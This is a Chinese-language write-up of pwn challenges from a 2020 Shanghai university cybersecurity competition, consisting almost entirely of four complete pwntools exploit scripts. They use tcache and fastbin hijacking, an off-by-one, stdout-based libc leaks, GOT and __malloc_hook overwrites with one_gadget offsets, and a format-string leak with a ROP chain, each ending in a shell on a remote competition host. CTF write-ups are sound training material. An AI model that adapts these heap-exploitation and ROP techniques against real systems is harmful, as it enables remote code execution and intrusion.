
上海大学生网络安全竞赛 pwn wp

作者: cnitlrt | 来源:发表于2020-11-15 16:51 被阅读0次
    cpu_emulator

    通过越界写劫持tcache数组，在其0x80和0x40的位置分别填入free的got表地址和atoi函数的got表地址；申请时先将free_got劫持为printf泄露libc，而后将atoi函数的got表劫持为system函数，从而获取shell。需要注意的是，本题使用的是更新过的2.27 libc，因此若直接劫持会crash。
    exp:

    #!/usr/bin/env python
    # -*- coding: utf-8 -*-
    import sys
    import os
    from pwn import *
    #__Author__ = Cnitlrt
    context.log_level = 'debug'  # log every byte exchanged with the target (handy when replaying the session)
    
    binary = 'emulator'
    elf = ELF('emulator')  # challenge binary; elf.plt[...] is used for the GOT overwrite further down
    libc = elf.libc  # the libc pwntools resolves for this ELF; every libc symbol/offset below assumes it matches the remote build
    context.binary = binary  # derives arch/bits/endianness for p32/p64/u32/u64 from the ELF headers
    
    DEBUG = 0  # 0: connect to the remote service, 1: run the binary locally, 2: ssh template (see below)
    if DEBUG:
      p = process(binary)
      # p=process(binary,env={"LD_PRELOAD":"./libc-2.27.so"})
    else:
      host = "123.56.52.128"
      port =  18236
      p = remote(host,port)
    if DEBUG == 2:
      # Unfilled ssh template: with DEBUG == 2 the local process started above is
      # discarded and `p` is rebound to an ssh tube with empty credentials, so this
      # branch only works once host/port/user/passwd are filled in.
      host = ""
      port = 0
      user = ""
      passwd = ""
      p = ssh(host,port,user,passwd)
    def l64():
        """Receive through the next 0x7f byte and unpack the last 6 bytes as a 64-bit value."""
        tail = p.recvuntil("\x7f")[-6:]
        return u64(tail.ljust(8, "\x00"))
    def l32():
        """Receive through the next 0xf7 byte and unpack the last 4 bytes as a 32-bit value."""
        tail = p.recvuntil("\xf7")[-4:]
        return u32(tail.ljust(4, "\x00"))
    def sla(a, b):
        """Wait for prompt `a`, then send `b` plus a newline (both passed through str())."""
        return p.sendlineafter(str(a), str(b))
    def sa(a, b):
        """Wait for prompt `a`, then send `b` with no trailing newline (both passed through str())."""
        return p.sendafter(str(a), str(b))
    def lg(name, data):
        """Log `data` as a hex value labelled `name` through the tube's success() logger."""
        message = ": 0x%x" % data
        return p.success(name + message)
    def se(payload):
        """Send `payload` as-is."""
        return p.send(payload)
    def rl():
        """Receive whatever is currently available on the tube."""
        return p.recv()
    def sl(payload):
        """Send `payload` followed by a newline."""
        return p.sendline(payload)
    def ru(a):
        """Receive until the delimiter str(a) has been seen (delimiter included)."""
        return p.recvuntil(str(a))
    def cmd(idx):
        """Pick menu entry `idx` at the ">> " prompt."""
        p.sendlineafter(">> ", str(idx))
    def opp(payload):
        """Menu option 1: upload `payload` as the instruction stream, sizing it by len(payload)."""
        cmd(1)
        size = len(payload)
        p.sendlineafter("size:\n", str(size))
        p.sendafter("instruction:\n", str(payload))
    def add1(size,payload):
        """Menu option 1 with an explicit `size`, then `payload` as the instruction bytes."""
        cmd(1)
        p.sendlineafter("size:\n", str(size))
        p.sendafter("instruction:\n", str(payload))
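    def _encode(op, idx, offset):
        """Pack one 32-bit emulator instruction word.

        The author's packing convention is the byte sequence
        ``p16(offset) + p8(idx) + p8(op)`` read back as a u32 on the
        little-endian x86-64 target (see the rax/rdx disassembly notes below),
        i.e.:

            bits 24-31  op      opcode byte
            bits 16-23  idx     register index
            bits  0-15  offset  16-bit operand

        The emulator's own field decoding (sketched in the notes below) uses
        different bit boundaries; the byte layout here is only the packing
        convention this script relies on.

        Raises ValueError when a field does not fit its width, mirroring the
        packers' behaviour instead of silently wrapping.
        """
        if not 0 <= op <= 0xff:
            raise ValueError("opcode does not fit in a byte: %r" % (op,))
        if not 0 <= idx <= 0xff:
            raise ValueError("register index does not fit in a byte: %r" % (idx,))
        if not 0 <= offset <= 0xffff:
            raise ValueError("offset does not fit in 16 bits: %r" % (offset,))
        return (op << 24) | (idx << 16) | offset
    def add(idx,offset):
        """Opcode 0x20 instruction on register `idx` with operand `offset` (used as add)."""
        return _encode(0x20, idx, offset)
    def sub(idx,offset):
        """Opcode 0x24 instruction on register `idx` with operand `offset` (used as sub)."""
        return _encode(0x24, idx, offset)
    def AND(idx,offset):
        """Opcode 0x30 instruction on register `idx` with operand `offset` (used as and)."""
        return _encode(0x30, idx, offset)
    def OR(idx,offset):
        """Opcode 0x34 instruction on register `idx` with operand `offset` (used as or)."""
        return _encode(0x34, idx, offset)
    def XOR(idx,offset):
        """Opcode 0x38 instruction on register `idx` with operand `offset` (used as xor)."""
        return _encode(0x38, idx, offset)
    def SHIFT(idx,offset):
        """Opcode 0x3c instruction on register `idx` with operand `offset` (used as shift)."""
        return _encode(0x3c, idx, offset)
    def read(idx,offset):
        """Opcode 0x8c instruction on register `idx` with operand `offset` (used as memory read)."""
        return _encode(0x8c, idx, offset)
    def write(idx,offset):
        """Opcode 0xac instruction on register `idx` with operand `offset` (used as memory write)."""
        return _encode(0xac, idx, offset)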
    """
    (0x3e00000 & a1) >> 21
    (0x1f0000 & a1) >>16
    (0xffff & a1)
    """
    """
    reg[0] = 0xfffe0000
    reg[0] = reg[0]+0xfdf0
    reg[1] = 0x600000
    reg[1] += reg[1]+0x2018
    memory[reg[0]] = reg[1]
    """
    free_got = 0x0000000000602018
    payload = p32(add(0x04,0x10))+p32(add(0x05,0x20))+p32(add(0x06,0x60))
    payload += p32(add(0x09,0x2))
    payload += p32(SHIFT(0x00,0xffff))+p32(add(0x00,0xfe20))
    payload += p32(write(0x04,0))+p32(write(0x05,1))+p32(write(0x06,2))
    payload += p32(add(0x04,0x58-0x20))
    payload += p32(SHIFT(0x00,0xffff))+p32(add(0x00,0xfe00))
    payload += p32(write(0x04,0))+p32(write(0x05,1))+p32(write(0x06,2))
    payload += p32(SHIFT(0x00,0xffff))+p32(add(0x00,0xfdb0))
    payload += p32(write(0x09,2))+p32(write(0x09,6))
    opp(payload)
    #rax = opcode >> 26
    #rdx = rax*4
    #eax = rdx+rax
    #rdx = [0x401404+rdx]
    #rax = 0x401404+[0x401404+4*(opcode >> 26)]
    #0x400ECD
    
    # b *0x400971
    # b *0x400A2D
    cmd(2)
    add1(0x78,p64(elf.plt["printf"])*2)
    add1(0x68,"%9$p")
    cmd(1)
    ru("0x")
    libc_base = int(p.recv(12),16)-231-libc.sym["__libc_start_main"]
    lg("libc_base",libc_base)
    sla("size:\n",str(0x38))
    sa("instruction:\n",p64(libc_base+libc.sym["system"]))
    # add1(0x38,p64(libc_base+libc.sym["system"]))
    cmd("sh")
    
    
    # gdb.attach(p,"""
    #   b *0x400eac
    # """)
    p.interactive()
    
    lgtwo

    off by one。没有show，劫持stdout泄露libc；double free劫持malloc_hook，one_gadget条件不满足，需要用libc_realloc调整栈帧。
    exp:

    #!/usr/bin/env python
    # -*- coding: utf-8 -*-
    import sys
    import os
    from pwn import *
    #__Author__ = Cnitlrt
    # context.log_level = 'debug'
    
    binary = 'pwn2'
    elf = ELF('pwn2')  # challenge binary
    libc = elf.libc  # the libc pwntools resolves for this ELF; every libc symbol/offset below assumes it matches the remote build
    context.binary = binary  # derives arch/bits/endianness for p8/p16/p64/u64 from the ELF headers
    
    DEBUG = 0  # 0: connect to the remote service, 1: run the binary locally, 2: ssh template (see below)
    if DEBUG:
      p = process(binary)
      # p=process(binary,env={"LD_PRELOAD":"./libc-2.27.so"})
    else:
      host = "123.56.52.128"
      port =  45830
      p = remote(host,port)
    if DEBUG == 2:
      # Unfilled ssh template: with DEBUG == 2 the local process started above is
      # discarded and `p` is rebound to an ssh tube with empty credentials, so this
      # branch only works once host/port/user/passwd are filled in.
      host = ""
      port = 0
      user = ""
      passwd = ""
      p = ssh(host,port,user,passwd)
    def l64():
        """Receive through the next 0x7f byte and unpack the last 6 bytes as a 64-bit value."""
        tail = p.recvuntil("\x7f")[-6:]
        return u64(tail.ljust(8, "\x00"))
    def l32():
        """Receive through the next 0xf7 byte and unpack the last 4 bytes as a 32-bit value."""
        tail = p.recvuntil("\xf7")[-4:]
        return u32(tail.ljust(4, "\x00"))
    def sla(a, b):
        """Wait for prompt `a`, then send `b` plus a newline (both passed through str())."""
        return p.sendlineafter(str(a), str(b))
    def sa(a, b):
        """Wait for prompt `a`, then send `b` with no trailing newline (both passed through str())."""
        return p.sendafter(str(a), str(b))
    def lg(name, data):
        """Log `data` as a hex value labelled `name` through the tube's success() logger."""
        message = ": 0x%x" % data
        return p.success(name + message)
    def se(payload):
        """Send `payload` as-is."""
        return p.send(payload)
    def rl():
        """Receive whatever is currently available on the tube."""
        return p.recv()
    def sl(payload):
        """Send `payload` followed by a newline."""
        return p.sendline(payload)
    def ru(a):
        """Receive until the delimiter str(a) has been seen (delimiter included)."""
        return p.recvuntil(str(a))
    def cmd(idx):
        """Pick menu entry `idx` at the ">> " prompt."""
        p.sendlineafter(">> ", str(idx))
    def add(size,payload):
        """Menu option 1: answer the "size?" prompt with `size` and the "content?" prompt with `payload`."""
        cmd(1)
        p.sendlineafter("size?\n", str(size))
        p.sendafter("content?\n", str(payload))
    def free(idx):
        """Menu option 2: give `idx` at the "index ?" prompt."""
        cmd(2)
        p.sendlineafter("index ?\n", str(idx))
    def edit(idx,payload):
        """Menu option 4: give `idx` at the "index ?" prompt, then `payload` at "content ?"."""
        cmd(4)
        p.sendlineafter("index ?\n", str(idx))
        p.sendafter("content ?\n", str(payload))
    # Exploit sequence, per the write-up: edit()'s off-by-one is used to overlap
    # chunks, stdout is corrupted to obtain the libc leak (the binary has no show
    # option), and a double free routes malloc through __malloc_hook/__realloc_hook.
    # The trailing "#n" comments are the author's chunk indices; the heap layout
    # they imply cannot be verified from this script alone.
    add(0xf8,"aaaa")#0
    add(0x68,"aaaa")#1
    add(0xf8,"aaaa")#2
    add(0xf8,"aaaa")#3
    add(0x68,"aaaa")#4
    add(0xf8,"aaaa")#5
    add(0x68,"aaaa")#6
    free(0)
    # 0x60 bytes of filler, an 8-byte 0x170 word, then one extra byte: the 0x00
    # lands one past the 0x68-byte chunk, presumably in the next chunk's size
    # field (the off-by-one), ahead of the free(2) that follows.
    edit(1,"a"*0x60+p64(0x70+0x100)+p8(0))
    free(2)
    add(0xf8,"aaaa")#0
    add(0x68,"aaaa")#2->1
    add(0xf8,"aaaa")#7
    free(0)
    add(0x68,"aaaa")
    add(0x68,"aaaa")#8
    # 2-byte partial overwrite of a freed chunk's forward pointer; per the
    # write-up this aims it at stdout.  0x25dd is specific to the challenge's
    # libc build.
    edit(8,p16(0x25dd))
    free(0)
    free(1)
    edit(2,p8(0x70))
    add(0x68,"aaa")#0
    add(0x68,"aaa")#1
    add(0x68,"aaa")#9
    # Assuming chunk 9 now overlaps stdout's _IO_FILE (standard layout): 0x33
    # bytes of filler, flags := 0xfbad1887, the three _IO_read_* pointers := 0,
    # and the low byte of _IO_write_base := 0x88, so the next flush writes out
    # libc memory instead of buffered output.
    edit(9,"a"*0x33+p64(0xfbad1887)+p64(0)*3+p8(0x88))
    libc_base = l64()-libc.sym["_IO_2_1_stdin_"]  # the first pointer in that output is expected to be &_IO_2_1_stdin_
    lg("libc_base",libc_base)
    free(4)
    free(0)
    # Forward pointer of a freed 0x70 chunk redirected to a fake chunk 0x23 bytes
    # below __malloc_hook (offset chosen by the author; see write-up).
    edit(2,p64(libc_base+libc.sym["__malloc_hook"]-0x23))
    add(0x68,"aaaa")
    add(0x68,"aaaa")
    # one_gadget output for the challenge libc; 0x4527a is the one used below.
    """
    0x45226 execve("/bin/sh", rsp+0x30, environ)
    constraints:
      rax == NULL
    
    0x4527a execve("/bin/sh", rsp+0x30, environ)
    constraints:
      [rsp+0x30] == NULL
    
    0xf0364 execve("/bin/sh", rsp+0x50, environ)
    constraints:
      [rsp+0x50] == NULL
    
    0xf1207 execve("/bin/sh", rsp+0x70, environ)
    constraints:
      [rsp+0x70] == NULL
    """
    # Write into the fake chunk: 0xb bytes of filler reach __realloc_hook (which in
    # these glibc builds sits 8 bytes before __malloc_hook) and set it to the
    # gadget; __malloc_hook is set to __libc_realloc+8.  Per the write-up the
    # malloc -> realloc detour adjusts the stack frame so the [rsp+0x30]==NULL
    # constraint holds.
    edit(4,"a"*(0x13-0x8)+p64(libc_base+0x4527a)+p64(libc_base+libc.sym["__libc_realloc"]+0x8))
    cmd(1)
    p.recv()
    p.sendline(str(0x100))  # any allocation now runs the hook chain
    # gdb.attach(p)
    p.interactive()
    
    maj0rone

    exp:

    #!/usr/bin/env python
    # -*- coding: utf-8 -*-
    # @Author: cnitlrt
    import sys
    import os
    from pwn import *
    # context.lo1
    context.log_level = 'debug'  # log every byte exchanged with the target (handy when replaying the session)
    
    binary = 'maj'
    elf = ELF('maj')  # challenge binary
    libc = elf.libc  # the libc pwntools resolves for this ELF; libc.sym and the raw offsets below assume it matches the remote build
    context.binary = binary  # derives arch/bits/endianness for p16/p64/u64 from the ELF headers
    
    DEBUG = 0  # 0: connect to the remote service, 1: run the binary locally, 2: ssh template (see below)
    if DEBUG:
      p = process(binary)
      # p=process(binary,env={"LD_PRELOAD":"./libc-2.27.so"})
    else:
      host = "123.56.52.128"
      port =  18523
      p = remote(host,port)
    if DEBUG == 2:
      # Unfilled ssh template: with DEBUG == 2 the local process started above is
      # discarded and `p` is rebound to an ssh tube with empty credentials, so this
      # branch only works once host/port/user/passwd are filled in.
      host = ""
      port = 0
      user = ""
      passwd = ""
      p = ssh(host,port,user,passwd)
    # one_gadget offsets for the challenge's libc build; only o_g[3] is used (edit(14, ...) below)
    o_g = [0x45226,0x4527a,0xf0364,0xf1207]
    # libc offsets noted by the author; `magic` is not referenced anywhere in this script
    magic = [0x3c4b10,0x3c67a8,0x846c0,0x45390]#malloc,free,realloc,system
    def l64():
        """Receive through the next 0x7f byte and unpack the last 6 bytes as a 64-bit value."""
        tail = p.recvuntil("\x7f")[-6:]
        return u64(tail.ljust(8, "\x00"))
    def l32():
        """Receive through the next 0xf7 byte and unpack the last 4 bytes as a 32-bit value."""
        tail = p.recvuntil("\xf7")[-4:]
        return u32(tail.ljust(4, "\x00"))
    def sla(a, b):
        """Wait for prompt `a`, then send `b` plus a newline (both passed through str())."""
        return p.sendlineafter(str(a), str(b))
    def sa(a, b):
        """Wait for prompt `a`, then send `b` with no trailing newline (both passed through str())."""
        return p.sendafter(str(a), str(b))
    def lg(name, data):
        """Log `data` as a hex value labelled `name` through the tube's success() logger."""
        message = ": 0x%x" % data
        return p.success(name + message)
    def se(payload):
        """Send `payload` as-is."""
        return p.send(payload)
    def rl():
        """Receive whatever is currently available on the tube."""
        return p.recv()
    def sl(payload):
        """Send `payload` followed by a newline."""
        return p.sendline(payload)
    def ru(a):
        """Receive until the delimiter str(a) has been seen (delimiter included)."""
        return p.recvuntil(str(a))
    def cmd(idx):
        """Pick menu entry `idx` at the ">> " prompt."""
        p.sendlineafter(">> ", str(idx))
    def add(size,payload):
        """Menu option 1: answer the quiz prompt with 80, give `size` at "______?", then send `payload`."""
        cmd(1)
        p.sendlineafter('please answer the question\n', str(80))
        p.sendlineafter("______?\n", str(size))
        p.sendafter("yes_or_no?\n", str(payload))
    def free(idx):
        """Menu option 2: give `idx` at the "index ?" prompt."""
        cmd(2)
        p.sendlineafter("index ?\n", str(idx))
    def show(idx):
        """Menu option 3: give `idx` at the "index ?" prompt."""
        cmd(3)
        p.sendlineafter("index ?\n", str(idx))
    def edit(idx,payload):
        """Menu option 4: give `idx` at the "index ?" prompt, then `payload` at "__new_content ?"."""
        cmd(4)
        p.sendlineafter("index ?\n", str(idx))
        p.sendafter("__new_content ?\n", str(payload))
    # Exploit sequence; the trailing "#n" comments are the author's chunk indices.
    # The heap manipulations below cannot be reconstructed from this script alone,
    # so only the steps whose effect is visible in the code are annotated.
    add(0x28,"0")
    add(0x68,"0")
    add(0x68,'0')
    add(0x68,'0')
    add(0x68,'0')
    edit(0,p64(0)+p64(0x71))  # fake chunk header (size 0x71) written into chunk 0's data
    payload = p64(0)+p64(0x21)
    edit(1,payload*6)  # six consecutive fake 0x21 headers across chunk 1
    free(2)
    free(1)
    edit(1,'\x10')  # edit on a freed index: 1-byte partial overwrite of chunk 1's forward pointer
    add(0x68,"1")
    add(0x68,"1")#6
    payload = p64(0)*3+p64(0x70+0x71)
    edit(6,payload)  # places a 0xe1 size word 0x18 bytes into chunk 6
    free(1)
    add(0x68,"a")#7
    add(0x68,"a")#8->2
    edit(6,payload)
    free(1)
    free(2)
    add(0x38,"a")#9
    add(0x28,"a")#10
    # 2-byte forward-pointer overwrite; per the write-up for the previous task the
    # same value targets stdout.  0x25dd is specific to the challenge's libc build.
    edit(8,p16(0x25dd))
    add(0x68,"a")
    add(0x68,"12")
    # Assuming chunk 12 overlaps stdout's _IO_FILE (standard layout): 0x33 bytes
    # of filler, flags := 0xfbad1887, the three _IO_read_* pointers := 0, low
    # byte of _IO_write_base := 0, so the next flush writes out libc memory.
    edit(12,"a"*0x33+p64(0xfbad1887)+p64(0)*3+p8(0))
    libc_base = l64()-0x3c5600  # hard-coded distance of the leaked pointer from libc base; libc-build specific
    lg("libc_base",libc_base)
    free(3)
    # edit on a freed index: chunk 3's forward pointer -> fake chunk 0x23 bytes
    # below __malloc_hook (offset chosen by the author).
    edit(3,p64(libc_base+libc.sym["__malloc_hook"]-0x23))
    add(0x68,"a")
    add(0x68,"14")
    edit(14,"a"*0x13+p64(o_g[3]+libc_base))  # 0x13 bytes of filler, then __malloc_hook := one_gadget 0xf1207
    cmd(1)
    sla('please answer the question\n',str(80))
    sla("______?\n",str(80))  # this allocation request fires the hook
    # gdb.attach(p)
    p.interactive()
    
    EASY_ABNORMAL

    exp:

    #!/usr/bin/env python
    # -*- coding: utf-8 -*-
    import sys
    import os
    from pwn import *
    #__Author__ = Cnitlrt
    #context.log_level = 'debug'
    
    binary = 'pwn111'
    elf = ELF('pwn111')  # challenge binary
    libc = elf.libc  # the libc pwntools resolves for this ELF; libc.sym, libc.search and the raw gadget offsets below assume it matches the remote build
    context.binary = binary  # derives arch/bits/endianness for p64/u64 from the ELF headers
    
    DEBUG = 0  # 0: connect to the remote service, 1: run the binary locally, 2: ssh template (see below)
    if DEBUG:
      p = process(binary)
      # p=process(binary,env={"LD_PRELOAD":"./libc-2.27.so"})
    else:
      host = "123.56.52.128"
      port =  10012
      p = remote(host,port)
    if DEBUG == 2:
      # Unfilled ssh template: with DEBUG == 2 the local process started above is
      # discarded and `p` is rebound to an ssh tube with empty credentials, so this
      # branch only works once host/port/user/passwd are filled in.
      host = ""
      port = 0
      user = ""
      passwd = ""
      p = ssh(host,port,user,passwd)
    def l64():
        """Receive through the next 0x7f byte and unpack the last 6 bytes as a 64-bit value."""
        tail = p.recvuntil("\x7f")[-6:]
        return u64(tail.ljust(8, "\x00"))
    def l32():
        """Receive through the next 0xf7 byte and unpack the last 4 bytes as a 32-bit value."""
        tail = p.recvuntil("\xf7")[-4:]
        return u32(tail.ljust(4, "\x00"))
    def sla(a, b):
        """Wait for prompt `a`, then send `b` plus a newline (both passed through str())."""
        return p.sendlineafter(str(a), str(b))
    def sa(a, b):
        """Wait for prompt `a`, then send `b` with no trailing newline (both passed through str())."""
        return p.sendafter(str(a), str(b))
    def lg(name, data):
        """Log `data` as a hex value labelled `name` through the tube's success() logger."""
        message = ": 0x%x" % data
        return p.success(name + message)
    def se(payload):
        """Send `payload` as-is."""
        return p.send(payload)
    def rl():
        """Receive whatever is currently available on the tube."""
        return p.recv()
    def sl(payload):
        """Send `payload` followed by a newline."""
        return p.sendline(payload)
    def ru(a):
        """Receive until the delimiter str(a) has been seen (delimiter included)."""
        return p.recvuntil(str(a))
    def cmd(idx):
        """Pick menu entry `idx` at the "E :" prompt."""
        p.sendlineafter("E :", str(idx))
    def add(payload):
        """Menu option 2: send `payload` (plus newline) at the "cnt:" prompt."""
        cmd(2)
        p.sendlineafter("cnt:\n", str(payload))
    def free(idx):
        """Menu option 3: give `idx` at the "idx:" prompt."""
        cmd(3)
        p.sendlineafter("idx:", str(idx))
    def show(idx):
        """Menu option 4.  `idx` is accepted for symmetry with free() but is never sent."""
        cmd(4)
    def gift(payload):
        """Hidden menu option 23333: send `payload` (no newline) at the "INPUT:" prompt."""
        cmd(23333)
        p.sendafter("INPUT:", str(payload))
    # Format-string leak through the name prompt: %11$p is expected to print a
    # return address inside __libc_start_main (+240, specific to the challenge's
    # libc build).
    sla("NAME: ","%11$p")
    cmd(1)
    ru("0x")
    libc_base = int(p.recv(12),16)-240-libc.sym["__libc_start_main"]
    lg("libc_base",libc_base)
    # ROP pieces; the raw offsets 0x21112 (pop rdi) and 0x0937 (ret) are
    # libc-build specific.
    pop_rdi = libc_base + 0x21112
    sys_addr = libc_base + libc.sym['system']
    sh_addr = libc_base + libc.search("/bin/sh").next()  # Python 2 iterator API (.next()); this script is Python 2
    ret = libc_base + 0x0937
    # Six `ret`s followed by system("/bin/sh"); stored twice on the heap below.
    payload = p64(ret)*6+p64(pop_rdi)+p64(sh_addr)+p64(sys_addr)
    add(payload)
    add(payload)
    free(0)
    free(1)
    show(1)  # show() ignores its argument; menu option 4 only
    ru("2:")
    # The value after "2:" is read as a raw 8-byte pointer.  Despite the name it is
    # the leaked pointer itself (presumably a freed chunk's forward pointer, i.e. a
    # heap address), not necessarily the heap base.
    heap_base = u64(ru("\n")[:-1].ljust(8,"\x00"))
    lg("heap_base",heap_base)
    
    # gdb.attach(p)
    # Option 23333: 0x20 bytes of filler, then a pointer into the heap chunk that
    # holds the chain.  What this write overwrites is not visible in this script --
    # presumably a saved stack slot that hands control to the chain; confirm in gdb.
    gift("a"*0x20+p64(heap_base+0x20))
    p.interactive()
    
